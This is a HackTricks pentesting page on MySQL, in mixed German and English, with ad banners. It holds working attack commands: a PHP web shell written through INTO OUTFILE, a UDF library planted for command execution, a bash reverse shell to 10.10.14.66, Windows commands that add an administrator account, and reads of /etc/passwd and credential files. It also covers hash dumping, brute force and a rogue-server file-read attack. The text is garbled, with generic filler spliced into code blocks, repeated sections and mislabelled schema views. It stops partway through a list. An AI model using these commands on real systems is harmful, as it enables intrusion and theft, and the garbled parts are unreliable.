hacktricks/network-services-pentesting/pentesting-mysql.md
2024-04-06 18:30:57 +00:00

46 KiB
Raw Blame History

3306 - Pentesting Mysql

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

RootedCON ist die relevanteste Cybersicherheitsveranstaltung in Spanien und eine der wichtigsten in Europa. Mit dem Ziel, technisches Wissen zu fördern, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsfachleute in jeder Disziplin.

{% embed url="https://www.rootedcon.com/" %}

Grundlegende Informationen

MySQL kann als Open-Source-Relationales Datenbankmanagementsystem (RDBMS) beschrieben werden, das kostenlos verfügbar ist. Es arbeitet mit der Structured Query Language (SQL) und ermöglicht die Verwaltung und Manipulation von Datenbanken.

Standardport: 3306

3306/tcp open  mysql

To connect to a local MySQL server, you can use the following command:

mysql -u <username> -p

Replace <username> with the username you want to use to connect to the server. You will be prompted to enter the password for the user.

Remote

To connect to a remote MySQL server, you can use the following command:

mysql -h <hostname> -P <port> -u <username> -p

Replace <hostname> with the IP address or hostname of the remote server, <port> with the port number on which the MySQL server is running (default is 3306), <username> with the username you want to use to connect, and you will be prompted to enter the password for the user.

Enumerate

Databases

To list all the databases on the MySQL server, you can use the following command:

SHOW DATABASES;

Tables

To list all the tables in a specific database, you can use the following command:

USE <database_name>;
SHOW TABLES;

Replace <database_name> with the name of the database you want to enumerate.

Columns

To list all the columns in a specific table, you can use the following command:

USE <database_name>;
SHOW COLUMNS FROM <table_name>;

Replace <database_name> with the name of the database and <table_name> with the name of the table you want to enumerate.

Data

To retrieve data from a specific table, you can use the following command:

USE <database_name>;
SELECT * FROM <table_name>;

Replace <database_name> with the name of the database and <table_name> with the name of the table from which you want to retrieve data.

Exploit

SQL Injection

SQL injection is a common vulnerability in web applications that use user-supplied input in SQL queries without proper sanitization. By injecting malicious SQL code, an attacker can manipulate the query to perform unauthorized actions or retrieve sensitive information.

To exploit SQL injection in a MySQL database, you need to identify vulnerable input points in the application and craft SQL payloads to manipulate the query. Common techniques include UNION-based attacks, boolean-based attacks, and time-based attacks.

Privilege Escalation

If you have limited privileges on a MySQL server, you can try to escalate your privileges to gain administrative access. Common techniques include exploiting misconfigurations, weak passwords, or vulnerabilities in the MySQL server software.

Once you have administrative access, you can perform actions such as creating new users, modifying permissions, or accessing sensitive data that was previously restricted.

Post-Exploitation

Dumping Data

To dump the contents of a MySQL database, you can use the following command:

mysqldump -u <username> -p <database_name> > dump.sql

Replace <username> with the username you used to connect to the MySQL server, <database_name> with the name of the database you want to dump, and dump.sql with the desired output file.

Cracking Hashed Passwords

If you have access to the MySQL user table, you can try to crack hashed passwords to gain unauthorized access to user accounts. Tools like John the Ripper or Hashcat can be used to perform password cracking attacks.

Remote Command Execution

If you have administrative access to a MySQL server, you can execute arbitrary commands on the underlying operating system. This can be done by creating a user-defined function that allows command execution or by exploiting vulnerabilities in the MySQL server software.

Mitigation

To protect against MySQL server vulnerabilities, consider the following mitigation techniques:

  • Sanitize user input to prevent SQL injection attacks.
  • Use strong passwords and avoid using default or easily guessable credentials.
  • Keep the MySQL server software up to date with the latest security patches.
  • Restrict access to the MySQL server to trusted IP addresses or networks.
  • Regularly monitor and review MySQL server logs for suspicious activity.
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Remote

Introduction

MySQL is a popular open-source relational database management system (RDBMS) used by many organizations to store and manage their data. As a penetration tester, it is important to understand how to assess the security of MySQL installations and identify potential vulnerabilities.

Enumeration

The first step in a MySQL penetration test is to gather information about the target system. This can be done using various enumeration techniques, such as port scanning, banner grabbing, and service fingerprinting.

Port Scanning

Port scanning is the process of scanning a range of TCP or UDP ports on a target system to determine which ports are open and listening for incoming connections. This can be done using tools like Nmap.

Banner Grabbing

Banner grabbing involves connecting to a service and capturing the banner or initial response sent by the server. This can provide valuable information about the service version and other details that can be used to identify potential vulnerabilities.

Service Fingerprinting

Service fingerprinting is the process of identifying the specific service running on a particular port. This can be done using tools like Nmap or by analyzing the responses received from the target system.

Exploitation

Once the target system has been enumerated and potential vulnerabilities have been identified, the next step is to exploit these vulnerabilities to gain unauthorized access or perform other malicious activities.

Default Credentials

One common vulnerability in MySQL installations is the use of default or weak credentials. Many users fail to change the default username and password, making it easy for an attacker to gain unauthorized access.

SQL Injection

SQL injection is a technique that allows an attacker to manipulate the SQL queries executed by a web application. This can be used to bypass authentication mechanisms, extract sensitive information, or even modify the database contents.

Remote Code Execution

Remote code execution (RCE) vulnerabilities allow an attacker to execute arbitrary code on the target system. This can be used to gain complete control over the system and perform various malicious activities.

Post-Exploitation

After gaining unauthorized access to a MySQL installation, there are several post-exploitation techniques that can be used to further compromise the system or maintain access.

Privilege Escalation

Privilege escalation involves gaining higher privileges on the target system than originally obtained. This can be done by exploiting misconfigurations, vulnerabilities, or weaknesses in the system.

Data Exfiltration

Data exfiltration involves stealing or extracting sensitive data from the target system. This can be done by querying the database, copying files, or using other techniques to transfer the data to an external location.

Persistence

Persistence involves maintaining access to the target system even after the initial compromise. This can be done by creating backdoors, modifying system configurations, or using other techniques to ensure continued access.

Conclusion

MySQL is a widely used database management system that can be a target for attackers. By understanding the enumeration, exploitation, and post-exploitation techniques discussed in this chapter, penetration testers can effectively assess the security of MySQL installations and help organizations protect their data.

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

Externe Enumeration

Einige der Enumeration-Aktionen erfordern gültige Anmeldeinformationen.

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute Force

Schreibe beliebige binäre Daten

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

MySQL-Befehle

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;
mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

MySQL Berechtigungen Enumeration

MySQL-Berechtigungen können verwendet werden, um Informationen über die Zugriffsrechte eines Benutzers auf eine MySQL-Datenbank zu sammeln. Dies kann hilfreich sein, um potenzielle Schwachstellen oder Angriffsvektoren zu identifizieren.

SHOW GRANTS

Die SHOW GRANTS-Anweisung kann verwendet werden, um die Berechtigungen eines bestimmten Benutzers anzuzeigen. Sie gibt eine Liste der Berechtigungen zurück, die dem Benutzer gewährt wurden.

SHOW GRANTS FOR 'username'@'localhost';

INFORMATION_SCHEMA

Die INFORMATION_SCHEMA-Datenbank enthält Informationen über die Datenbankstruktur, einschließlich der Berechtigungen. Sie kann verwendet werden, um detaillierte Informationen über die Berechtigungen aller Benutzer in der Datenbank abzurufen.

SELECT * FROM INFORMATION_SCHEMA.USER_PRIVILEGES;

mysql.user-Tabelle

Die mysql.user-Tabelle enthält Informationen über die Benutzer und deren Berechtigungen. Sie kann verwendet werden, um detaillierte Informationen über die Berechtigungen eines bestimmten Benutzers abzurufen.

SELECT * FROM mysql.user WHERE User = 'username';

mysql.db-Tabelle

Die mysql.db-Tabelle enthält Informationen über die Datenbanken und die Berechtigungen der Benutzer für diese Datenbanken. Sie kann verwendet werden, um detaillierte Informationen über die Berechtigungen eines bestimmten Benutzers für eine bestimmte Datenbank abzurufen.

SELECT * FROM mysql.db WHERE User = 'username' AND Db = 'database';

mysql.tables_priv-Tabelle

Die mysql.tables_priv-Tabelle enthält Informationen über die Berechtigungen der Benutzer für bestimmte Tabellen. Sie kann verwendet werden, um detaillierte Informationen über die Berechtigungen eines bestimmten Benutzers für eine bestimmte Tabelle abzurufen.

SELECT * FROM mysql.tables_priv WHERE User = 'username' AND Db = 'database' AND Table_name = 'table';

Es ist wichtig, die Berechtigungen sorgfältig zu überprüfen, um potenzielle Sicherheitslücken zu identifizieren und zu beheben.

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Sie können in der Dokumentation die Bedeutung jeder Berechtigung sehen: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

{% content-ref url="../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md" %} mysql-ssrf.md {% endcontent-ref %}

MySQL beliebige Dateilese durch den Client

Tatsächlich, wenn Sie versuchen, Daten lokal in eine Tabelle zu laden, fragt der MySQL- oder MariaDB-Server den Client, sie zu lesen und den Inhalt zu senden. Dann, wenn Sie einen MySQL-Client manipulieren können, um sich mit Ihrem eigenen MySQL-Server zu verbinden, können Sie beliebige Dateien lesen.
Bitte beachten Sie, dass dies das Verhalten bei Verwendung von:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Anmerkung zum Wort "local")
Denn ohne das Wort "local" können Sie Folgendes erhalten:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Anfangs PoC: https://github.com/allyshka/Rogue-MySql-Server
In diesem Artikel finden Sie eine vollständige Beschreibung des Angriffs und sogar wie man ihn auf RCE erweitert: https://paper.seebug.org/1113/
Hier finden Sie eine Übersicht über den Angriff: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

RootedCON ist die relevanteste Cybersicherheitsveranstaltung in Spanien und eine der wichtigsten in Europa. Mit dem Ziel, technisches Wissen zu fördern, ist dieser Kongress ein brodelnder Treffpunkt für Technologie- und Cybersicherheitsprofis in jeder Disziplin.

{% embed url="https://www.rootedcon.com/" %}

POST

Mysql-Benutzer

Es wäre sehr interessant, wenn mysql als root ausgeführt wird:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Gefährliche Einstellungen von mysqld.cnf

In der Konfiguration der MySQL-Dienste werden verschiedene Einstellungen verwendet, um deren Betrieb und Sicherheitsmaßnahmen festzulegen:

  • Die user-Einstellung wird verwendet, um den Benutzer festzulegen, unter dem der MySQL-Dienst ausgeführt wird.
  • password wird verwendet, um das Passwort für den MySQL-Benutzer festzulegen.
  • admin_address gibt die IP-Adresse an, die auf der administrativen Netzwerkschnittstelle auf TCP/IP-Verbindungen lauscht.
  • Die Variable debug gibt Auskunft über die aktuellen Debugging-Konfigurationen, einschließlich sensibler Informationen in den Protokollen.
  • sql_warnings steuert, ob Informationszeichenketten für einzelne INSERT-Anweisungen generiert werden, wenn Warnungen auftreten, einschließlich sensibler Daten in den Protokollen.
  • Mit secure_file_priv wird der Umfang von Datenimport- und Exportoperationen eingeschränkt, um die Sicherheit zu erhöhen.

Privilege-Eskalation

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Privilege Escalation über eine Bibliothek

Wenn der MySQL-Server als Root (oder als anderer privilegierter Benutzer) läuft, können Sie ihn dazu bringen, Befehle auszuführen. Dafür müssen Sie benutzerdefinierte Funktionen verwenden. Und um eine benutzerdefinierte Funktion zu erstellen, benötigen Sie eine Bibliothek für das Betriebssystem, auf dem MySQL läuft.

Die schädliche Bibliothek kann in sqlmap und in Metasploit gefunden werden, indem Sie locate "*lib_mysqludf_sys*" ausführen. Die .so-Dateien sind Linux-Bibliotheken und die .dll-Dateien sind diejenigen für Windows. Wählen Sie diejenige, die Sie benötigen.

Wenn Sie diese Bibliotheken nicht haben, können Sie entweder nach ihnen suchen oder diesen Linux C-Code herunterladen und auf der anfälligen Linux-Maschine kompilieren:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Jetzt, da Sie die Bibliothek haben, melden Sie sich als privilegierter Benutzer (root?) in Mysql an und befolgen Sie die nächsten Schritte:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

MySQL Enumeration

MySQL ist ein weit verbreitetes relationales Datenbankverwaltungssystem, das auf Windows-Systemen häufig eingesetzt wird. Bei der Pentesting von MySQL-Diensten auf Windows-Plattformen gibt es verschiedene Techniken, die verwendet werden können, um Informationen zu sammeln und Schwachstellen zu identifizieren.

Port Scanning

Um MySQL-Dienste auf einem Windows-System zu finden, kann ein Port-Scanner wie Nmap verwendet werden. Der Standardport für MySQL ist 3306. Ein einfacher Befehl, um nach offenen MySQL-Ports zu suchen, lautet:

nmap -p 3306 <Ziel-IP>

Versionserkennung

Nachdem ein offener MySQL-Port gefunden wurde, kann die Version des MySQL-Servers ermittelt werden. Dies kann mit dem Befehl mysql --version erfolgen. Alternativ kann auch ein Skript wie mysql_version.nse in Nmap verwendet werden:

nmap -p 3306 --script mysql_version <Ziel-IP>

Anmelden mit Standardanmeldeinformationen

Es ist wichtig, die Standardanmeldeinformationen für MySQL zu überprüfen, da viele Benutzer diese nicht ändern. Die Standardanmeldeinformationen für MySQL auf Windows sind normalerweise:

  • Benutzername: root
  • Passwort: leer (kein Passwort)

Um sich mit diesen Standardanmeldeinformationen anzumelden, kann der Befehl mysql -u root -p verwendet werden. Wenn das Passwort leer ist, kann einfach die Eingabetaste gedrückt werden.

Bruteforce-Angriff

Wenn die Standardanmeldeinformationen nicht funktionieren, kann ein Bruteforce-Angriff durchgeführt werden, um das Passwort für den MySQL-Benutzer zu erraten. Es gibt verschiedene Tools, die für diesen Zweck verwendet werden können, wie z.B. Hydra oder Medusa.

Ein Beispielbefehl für Hydra lautet:

hydra -L <Benutzerliste> -P <Passwortliste> <Ziel-IP> mysql

Schwachstellenanalyse

Nachdem eine erfolgreiche Anmeldung erfolgt ist, können Schwachstellen im MySQL-Server aufgedeckt werden. Dies kann durch Überprüfen der MySQL-Version und der installierten Plugins erfolgen. Es gibt auch spezielle Tools wie SQLMap, die für die Schwachstellenanalyse von MySQL-Diensten verwendet werden können.

Datenbankerkundung

Sobald Zugriff auf den MySQL-Server erhalten wurde, können verschiedene Techniken zur Datenbankerkundung verwendet werden. Dies umfasst das Anzeigen der vorhandenen Datenbanken, Tabellen und Spalten, das Ausführen von SQL-Abfragen und das Extrahieren von Daten.

Privilege Escalation

Wenn ein Benutzer mit eingeschränkten Berechtigungen angemeldet ist, kann versucht werden, die Berechtigungen zu eskalieren, um Zugriff auf weitere Datenbanken oder privilegierte Funktionen zu erhalten. Dies kann durch Ausnutzen von Schwachstellen oder durch Manipulation von Benutzerberechtigungen erfolgen.

Datenbankdump

Ein Datenbankdump kann verwendet werden, um den gesamten Inhalt einer Datenbank zu extrahieren. Dies kann mit dem Befehl mysqldump erfolgen:

mysqldump -u <Benutzername> -p <Datenbankname> > dump.sql

Der Datenbankdump wird in einer SQL-Datei gespeichert, die dann analysiert oder auf einen anderen Server importiert werden kann.

Passwort-Hashes

In einigen Fällen können Passwort-Hashes in der MySQL-Datenbank gespeichert sein. Diese Hashes können extrahiert und dann mit Tools wie John the Ripper oder Hashcat geknackt werden, um die ursprünglichen Passwörter wiederherzustellen.

Sicherheitslücken

Es ist wichtig, bekannte Sicherheitslücken in MySQL zu überprüfen und zu überprüfen, ob der verwendete MySQL-Server davon betroffen ist. Dies kann durch Überprüfen von Sicherheitsbulletins und Exploit-Datenbanken erfolgen.

Abschluss

Die Pentesting von MySQL-Diensten auf Windows-Systemen erfordert das Verständnis verschiedener Techniken zur Enumeration, Anmeldung, Schwachstellenanalyse und Datenbankerkundung. Durch die Anwendung dieser Techniken können Sicherheitslücken identifiziert und potenzielle Angriffspunkte aufgedeckt werden.

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Extrahieren von MySQL-Anmeldeinformationen aus Dateien

In /etc/mysql/debian.cnf finden Sie das Klartext-Passwort des Benutzers debian-sys-maint.

cat /etc/mysql/debian.cnf

Sie können diese Anmeldeinformationen verwenden, um sich in der MySQL-Datenbank anzumelden.

In der Datei: /var/lib/mysql/mysql/user.MYD finden Sie alle Hashes der MySQL-Benutzer (diejenigen, die Sie aus mysql.user in der Datenbank extrahieren können).

Sie können sie extrahieren, indem Sie Folgendes tun:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Aktivieren der Protokollierung

Sie können die Protokollierung von MySQL-Abfragen aktivieren, indem Sie die folgenden Zeilen in der Datei /etc/mysql/my.cnf auskommentieren:

Nützliche Dateien

Konfigurationsdateien

  • windows *
  • config.ini
  • my.ini
  • windows\my.ini
  • winnt\my.ini
  • <InstDir>/mysql/data/
  • unix
  • my.cnf
  • /etc/my.cnf
  • /etc/mysql/my.cnf
  • /var/lib/mysql/my.cnf
  • ~/.my.cnf
  • /etc/my.cnf
  • Befehlshistorie
  • ~/.mysql.history
  • Protokolldateien
  • connections.log
  • update.log
  • common.log

Standard MySQL-Datenbank/Tabellen

ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
CHECK_CONSTRAINTS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
KEY_CACHES
OPTIMIZER_TRACE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
INNODB_LOCKS
INNODB_TRX
INNODB_SYS_DATAFILES
INNODB_FT_CONFIG
INNODB_SYS_VIRTUAL
INNODB_CMP
INNODB_FT_BEING_DELETED
INNODB_CMP_RESET
INNODB_CMP_PER_INDEX
INNODB_CMPMEM_RESET
INNODB_FT_DELETED
INNODB_BUFFER_PAGE_LRU
INNODB_LOCK_WAITS
INNODB_TEMP_TABLE_INFO
INNODB_SYS_INDEXES
INNODB_SYS_TABLES
INNODB_SYS_FIELDS
INNODB_CMP_PER_INDEX_RESET
INNODB_BUFFER_PAGE
INNODB_FT_DEFAULT_STOPWORD
INNODB_FT_INDEX_TABLE
INNODB_FT_INDEX_CACHE
INNODB_SYS_TABLESPACES
INNODB_METRICS
INNODB_SYS_FOREIGN_COLS
INNODB_CMPMEM
INNODB_BUFFER_POOL_STATS
INNODB_SYS_COLUMNS
INNODB_SYS_FOREIGN
INNODB_SYS_TABLESTATS
GEOMETRY_COLUMNS
SPATIAL_REF_SYS
CLIENT_STATISTICS
INDEX_STATISTICS
USER_STATISTICS
INNODB_MUTEXES
TABLE_STATISTICS
INNODB_TABLESPACES_ENCRYPTION
user_variables
INNODB_TABLESPACES_SCRUBBING
INNODB_SYS_SEMAPHORE_WAITS

columns_priv
column_stats
db
engine_cost
event
func
general_log
gtid_executed
gtid_slave_pos
help_category
help_keyword
help_relation
help_topic
host
index_stats
innodb_index_stats
innodb_table_stats
ndb_binlog_index
plugin
proc
procs_priv
proxies_priv
roles_mapping
server_cost
servers
slave_master_info
slave_relay_log_info
slave_worker_info
slow_log
tables_priv
table_stats
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
transaction_registry
user

accounts
cond_instances
events_stages_current
events_stages_history
events_stages_history_long
events_stages_summary_by_account_by_event_name
events_stages_summary_by_host_by_event_name
events_stages_summary_by_thread_by_event_name
events_stages_summary_by_user_by_event_name
events_stages_summary_global_by_event_name
events_statements_current
events_statements_history
events_statements_history_long
events_statements_summary_by_account_by_event_name
events_statements_summary_by_digest
events_statements_summary_by_host_by_event_name
events_statements_summary_by_program
events_statements_summary_by_thread_by_event_name
events_statements_summary_by_user_by_event_name
events_statements_summary_global_by_event_name
events_transactions_current
events_transactions_history
events_transactions_history_long
events_transactions_summary_by_account_by_event_name
events_transactions_summary_by_host_by_event_name
events_transactions_summary_by_thread_by_event_name
events_transactions_summary_by_user_by_event_name
events_transactions_summary_global_by_event_name
events_waits_current
events_waits_history
events_waits_history_long
events_waits_summary_by_account_by_event_name
events_waits_summary_by_host_by_event_name
events_waits_summary_by_instance
events_waits_summary_by_thread_by_event_name
events_waits_summary_by_user_by_event_name
events_waits_summary_global_by_event_name
file_instances
file_summary_by_event_name
file_summary_by_instance
global_status
global_variables
host_cache
hosts
memory_summary_by_account_by_event_name
memory_summary_by_host_by_event_name
memory_summary_by_thread_by_event_name
memory_summary_by_user_by_event_name
memory_summary_global_by_event_name
metadata_locks
mutex_instances
objects_summary_global_by_type
performance_timers
prepared_statements_instances
replication_applier_configuration
replication_applier_status
replication_applier_status_by_coordinator
replication_applier_status_by_worker
replication_connection_configuration
replication_connection_status
replication_group_member_stats
replication_group_members
rwlock_instances
session_account_connect_attrs
session_connect_attrs
session_status
session_variables
setup_actors
setup_consumers
setup_instruments
setup_objects
setup_timers
socket_instances
socket_summary_by_event_name
socket_summary_by_instance
status_by_account
status_by_host
status_by_thread
status_by_user
table_handles
table_io_waits_summary_by_index_usage
table_io_waits_summary_by_table
table_lock_waits_summary_by_table
threads
user_variables_by_thread
users
variables_by_thread

host_summary
host_summary_by_file_io
host_summary_by_file_io_type
host_summary_by_stages
host_summary_by_statement_latency
host_summary_by_statement_type
innodb_buffer_stats_by_schema
innodb_buffer_stats_by_table
innodb_lock_waits
io_by_thread_by_latency
io_global_by_file_by_bytes
io_global_by_file_by_latency
io_global_by_wait_by_bytes
io_global_by_wait_by_latency
latest_file_io
memory_by_host_by_current_bytes
memory

Schema_Table_Statistics

  • Beschreibung: Diese Ansicht enthält Statistiken zu den Tabellen in den Schemata der Datenbank.
  • Befehl: SELECT * FROM performance_schema.schema_table_statistics;

Schema_Table_Statistics_With_Buffer

  • Beschreibung: Diese Ansicht enthält Statistiken zu den Tabellen in den Schemata der Datenbank, einschließlich der Pufferstatistiken.
  • Befehl: SELECT * FROM performance_schema.schema_table_statistics_with_buffer;

Schema_Tables_With_Full_Table_Scans

  • Beschreibung: Diese Ansicht enthält Informationen zu den Tabellen in den Schemata der Datenbank, die vollständige Tabellenscans durchführen.
  • Befehl: SELECT * FROM performance_schema.schema_tables_with_full_table_scans;

Schema_Unused_Indexes

  • Beschreibung: Diese Ansicht enthält Informationen zu den ungenutzten Indizes in den Schemata der Datenbank.
  • Befehl: SELECT * FROM performance_schema.schema_unused_indexes;

Session

  • Beschreibung: Diese Ansicht enthält Informationen zu den aktuellen Sitzungen in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.session;

Session_SSL_Status

  • Beschreibung: Diese Ansicht enthält Informationen zum SSL-Status der aktuellen Sitzungen in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.session_ssl_status;

Statement_Analysis

  • Beschreibung: Diese Ansicht enthält Informationen zur Analyse von SQL-Anweisungen in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.statement_analysis;

Statements_With_Errors_Or_Warnings

  • Beschreibung: Diese Ansicht enthält Informationen zu SQL-Anweisungen mit Fehlern oder Warnungen in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.statements_with_errors_or_warnings;

Statements_With_Full_Table_Scans

  • Beschreibung: Diese Ansicht enthält Informationen zu SQL-Anweisungen, die vollständige Tabellenscans durchführen, in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.statements_with_full_table_scans;

Statements_With_Runtimes_In_95th_Percentile

  • Beschreibung: Diese Ansicht enthält Informationen zu SQL-Anweisungen mit Laufzeiten im 95. Perzentil in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.statements_with_runtimes_in_95th_percentile;

Statements_With_Sorting

  • Beschreibung: Diese Ansicht enthält Informationen zu SQL-Anweisungen mit Sortierungen in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.statements_with_sorting;

Statements_With_Temp_Tables

  • Beschreibung: Diese Ansicht enthält Informationen zu SQL-Anweisungen mit temporären Tabellen in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.statements_with_temp_tables;

Sys_Config

  • Beschreibung: Diese Ansicht enthält Informationen zur Konfiguration des Systems in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.sys_config;

User_Summary

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten der Benutzer in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.user_summary;

User_Summary_By_File_IO

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten der Benutzer nach Datei-E/A in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.user_summary_by_file_io;

User_Summary_By_File_IO_Type

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten der Benutzer nach Datei-E/A-Typ in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.user_summary_by_file_io_type;

User_Summary_By_Stages

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten der Benutzer nach Phasen in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.user_summary_by_stages;

User_Summary_By_Statement_Latency

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten der Benutzer nach Anweisungsverzögerung in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.user_summary_by_statement_latency;

User_Summary_By_Statement_Type

  • Beschreibung: Diese Ansicht enthält Zusammenfassungen der Aktivitäten der Benutzer nach Anweisungstyp in der Datenbank.
  • Befehl: SELECT * FROM performance_schema.user_summary_by_statement_type;

Version

  • Beschreibung: Diese Ansicht enthält Informationen zur Version der Datenbank.
  • Befehl: SELECT * FROM performance_schema.version;

Wait_Classes_Global_By_Avg_Latency

  • Beschreibung: Diese Ansicht enthält Informationen zu den Wartezeiten in den globalen Warteklassen basierend auf der durchschnittlichen Verzögerung.
  • Befehl: SELECT * FROM performance_schema.wait_classes_global_by_avg_latency;

Wait_Classes_Global_By_Latency

  • Beschreibung: Diese Ansicht enthält Informationen zu den Wartezeiten in den globalen Warteklassen basierend auf der Verzögerung.
  • Befehl: SELECT * FROM performance_schema.wait_classes_global_by_latency;

Waits_By_Host_By_Latency

  • Beschreibung: Diese Ansicht enthält Informationen zu den Wartezeiten nach Host und Verzögerung.
  • Befehl: SELECT * FROM performance_schema.waits_by_host_by_latency;

Waits_By_User_By_Latency

  • Beschreibung: Diese Ansicht enthält Informationen zu den Wartezeiten nach Benutzer und Verzögerung.
  • Befehl: SELECT * FROM performance_schema.waits_by_user_by_latency;

Waits_Global_By_Latency

  • Beschreibung: Diese Ansicht enthält Informationen zu den globalen Wartezeiten basierend auf der Verzögerung.
  • Befehl: SELECT * FROM performance_schema.waits_global_by_latency;

X$Host_Summary

